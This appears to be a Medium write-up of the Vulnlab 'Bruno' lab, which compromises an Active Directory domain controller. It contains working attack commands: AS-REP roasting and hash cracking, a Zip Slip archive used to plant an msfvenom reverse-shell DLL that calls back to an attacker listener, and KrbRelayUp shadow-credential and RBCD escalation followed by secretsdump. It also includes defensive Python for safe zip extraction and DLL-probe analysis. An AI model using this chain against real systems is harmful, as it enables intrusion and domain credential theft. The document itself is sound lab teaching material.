arz101.medium.com

Vulnlab — Bruno

ARZ101

Bruno involved enumerating FTP shares to find a SampleScanner binary along with a user account, which led to AS-REP roasting. Analyzing the binary revealed that it is vulnerable to path traversal, through which DLL hijacking was performed to gain a reverse shell as the svc_scan user; privileges were then escalated by performing RBCD or shadow credentials through KrbRelayUp.

PORT      STATE SERVICE    VERSION   
21/tcp open tcpwrapped
53/tcp open tcpwrapped
80/tcp open tcpwrapped
135/tcp open tcpwrapped
139/tcp open tcpwrapped
443/tcp open tcpwrapped
88/tcp open kerberos-sec
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=bruno-BRUNODC-CA
| Issuer: commonName=bruno-BRUNODC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-29T13:23:01
| Not valid after: 2121-06-29T13:33:00
| MD5: 659b3c9000eb1e0a51701be90456840c
|_SHA-1: a093f4c23c8e053286f21e99cad782f8e40e3d72
445/tcp open tcpwrapped
636/tcp open tcpwrapped
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Issuer: commonName=bruno-BRUNODC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-22T06:05:15
| Not valid after: 2024-08-21T06:05:15
| MD5: 1f78c03b2d8da3ec00765fcc68d5973b
|_SHA-1: be3a109df3cfefcf7a8078654bbbf09ae7950fd5
3269/tcp open tcpwrapped
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Issuer: commonName=bruno-BRUNODC-CA
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Issuer: commonName=brunodc.bruno.vl

PORT 21 (FTP)

Logging in as an anonymous user on FTP, we can find a few directories.

From the app folder, there's SampleScanner.

Reading the changelog file, we can see a username: svc_scan.

Since we are targeting a domain controller, we can check for AS-REP roasting (accounts with Kerberos pre-authentication disabled).

Having the hash, we attempt to crack it with hashcat:

hashcat -a 0 -m 18200 ./svc_scan.txt /usr/share/wordlists/rockyou.txt  --force

Listing the shares with this user, we have write access to the `queue` share.

At this point we need to understand what SampleScanner is doing and what the queue share folder is used for, so we analyze SampleScanner.dll with ILSpy.

Gaining Foothold Through DLL Hijacking

This DLL looks for a zip file in C:\Samples\queue, extracts it and deletes the zip file. If the file is not a zip, it checks for the occurrence of the AV test file pattern defined by the text string: a match is placed in the malicious folder, anything else in the benign folder. To observe this, we run it locally after transferring all the required files.

Creating \Samples\queue in C:\ and placing a zip file for testing.

Running SampleScanner extracts the contents of the zip file.

Here we can perform path traversal to extract a file to any location, which is known as Zip Slip. To create such a zip file we can use evilarc.py, or use 7-Zip to edit the filename to ..\file.txt.

This extracts the contents of evil.zip outside the C:\Samples\queue directory.
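The extraction step is exactly where Zip Slip bites. As an added example (not code from the post or from SampleScanner, which is a .NET program), here is a Python extractor that rejects any archive entry whose name resolves outside the queue folder, including the backslash form ..\file.txt that a Windows extractor honours; the sample archive is constructed inline.

```python
import io
import os
import zipfile
from pathlib import PurePosixPath, PureWindowsPath

def is_zip_slip(entry_name: str) -> bool:
    """True if an entry name would land outside the extraction root.
    Checks both separators, absolute paths and drive letters, since a
    Windows extractor treats '..\\file.txt' as a parent-directory hop."""
    normalized = entry_name.replace("\\", "/")
    win = PureWindowsPath(entry_name)
    if win.drive or win.is_absolute() or normalized.startswith("/"):
        return True
    return ".." in PurePosixPath(normalized).parts

def safe_extract(zip_bytes: bytes, dest: str) -> dict:
    """Extract only entries that resolve inside dest.
    Returns {'written': [...], 'rejected': [...]} so a scanner can log probes."""
    root = os.path.realpath(dest)
    report = {"written": [], "rejected": []}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            rel = info.filename.replace("\\", "/")
            target = os.path.realpath(os.path.join(root, rel))
            # Name-level check plus resolved-path check (symlinks, odd roots).
            if is_zip_slip(info.filename) or os.path.commonpath([root, target]) != root:
                report["rejected"].append(info.filename)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            report["written"].append(os.path.relpath(target, root))
    return report

def build_sample_zip() -> bytes:
    """Constructed sample (not from the post): one benign entry plus one
    entry whose name hops to the parent directory, as Zip Slip does."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("eicar.txt", "placeholder")
        zf.writestr("..\\outside.txt", "placeholder")
    return buf.getvalue()
```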

Since this is being run as svc_scan, we can achieve remote code execution by replacing a DLL used by SampleScanner. To find out which DLL to place, we use Process Monitor with filters showing the DLLs the exe tries to load but cannot find.

Here we see two DLLs which are used by this program but not found in the current path: hostfxr.dll and Microsoft.DiaSymReader.Native.amd64.dll. We generate a DLL through msfvenom and replace the DiaSymReader DLL.
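One way to automate the Process Monitor filter described above, as an added example rather than anything from the post: parse a Procmon CSV export and list the DLLs SampleScanner probed for but did not find, flagging those under a directory the svc_scan account can write to (the C:\Samples tree reachable through the queue share). The CSV lines are constructed.

```python
import csv
import io

# Constructed Procmon-style CSV export (not a capture from the post); the
# column names are the ones Procmon writes when saving a trace as CSV.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:00:01.0000000","SampleScanner.exe","4120","CreateFile","C:\Samples\app\hostfxr.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0000100","SampleScanner.exe","4120","CreateFile","C:\Program Files\dotnet\host\fxr\6.0.0\hostfxr.dll","SUCCESS","Desired Access: Read Attributes"
"10:00:01.0000200","SampleScanner.exe","4120","CreateFile","C:\Samples\app\Microsoft.DiaSymReader.Native.amd64.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0000300","SampleScanner.exe","4120","CreateFile","C:\Samples\app\SampleScanner.dll","SUCCESS","Desired Access: Read Attributes"
"10:00:01.0000400","explorer.exe","1234","CreateFile","C:\Windows\System32\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
'''

def missing_dll_probes(csv_text: str, process: str, writable_roots: tuple) -> list:
    """Return one dict per DLL path the process looked for and did not find.
    'writable' marks probes under a directory a low-privileged user can write
    to, i.e. the failed lookups that become a hijack opportunity."""
    seen = set()
    probes = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        path = row["Path"]
        if (row["Process Name"].lower() != process.lower()
                or row["Operation"] != "CreateFile"
                or row["Result"] != "NAME NOT FOUND"
                or not path.lower().endswith(".dll")):
            continue
        key = path.lower()
        if key in seen:  # report each probed path once
            continue
        seen.add(key)
        writable = any(key.startswith(root.lower()) for root in writable_roots)
        probes.append({"path": path, "writable": writable})
    return probes
```

Note that hostfxr.dll is later found under the dotnet install, so only the first lookup in the application directory is the interesting one.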

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.154 LPORT=2222 -f dll > test.dll

Executing SampleScanner now triggers a reverse shell, as we have placed our malicious DLL.

To do this on the target machine, we need to place the DLL with the path traversal ..\app\Microsoft.DiaSymReader.Native.amd64.dll; since svc_scan has write access to the queue share folder, we can upload the archive file over SMB.

Within seconds we receive a connection on our listener.

Checking the privileges of the svc_scan user, it doesn't have any interesting privileges.

Running bloodhound.py to enumerate the domain:

python3 bloodhound.py -u 'svc_scan' -p 'Sunshine1' -d 'bruno.vl' -c all -ns 10.10.84.94

There wasn't any path leading to domain admin from svc_scan.

However, we can see that svc_net is AS-REP roastable.

Through GetNPUsers.py we can retrieve the AS-REP (encrypted TGT material) for svc_net and attempt to crack it:

GetNPUsers.py bruno.vl/svc_net -no-pass -dc-ip 10.10.108.253

It's the same password as svc_scan. This user didn't have any special privileges either, but from winPEAS we can see the target is vulnerable to KrbRelayUp.

Privilege Escalation through Shadow Credentials

To escalate privileges through KrbRelayUp, we need to ensure that LDAP signing is disabled and that we are allowed to add a machine account. The latter is optional, as we can abuse shadow credentials instead if PKINIT is supported by the DC. Through cme we can verify the machine account quota:

cme ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M maq

Also, we can see that LDAP signing is not enforced:

cme ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M ldap-checker

To use KrbRelayUp, we need a valid CLSID; for that I grabbed one from the updated list of working CLSIDs from here.

Using the shadow credentials method on port 10246, as this was the port that was available:

.\KrbRelayUp.exe full -m shadowcred -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246

Using Rubeus to request a TGT for brunodc$ through PKINIT authentication:

Rubeus.exe asktgt /user:brunodc$ /certificate:MIIKSAIBAzCCCgQGC...snip.... /password:tV0-oN8$aB7- /enctype:AES256 /nowrap

Converting the kirbi format to ccache so we can use it with secretsdump.py:

secretsdump.py 'brunodc$'@brunodc.bruno.vl -k -no-pass

Privilege Escalation through Resource Based Constrained Delegation (RBCD)

We can also perform Resource Based Constrained Delegation (RBCD) by creating a machine account and adding that account to brunodc's msDS-AllowedToActOnBehalfOfOtherIdentity property:

.\KrbRelayUp.exe full -m rbcd -c -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246

Requesting a service ticket as the administrator through getST.py:

Having the ticket, we can log in through smbexec.py.

References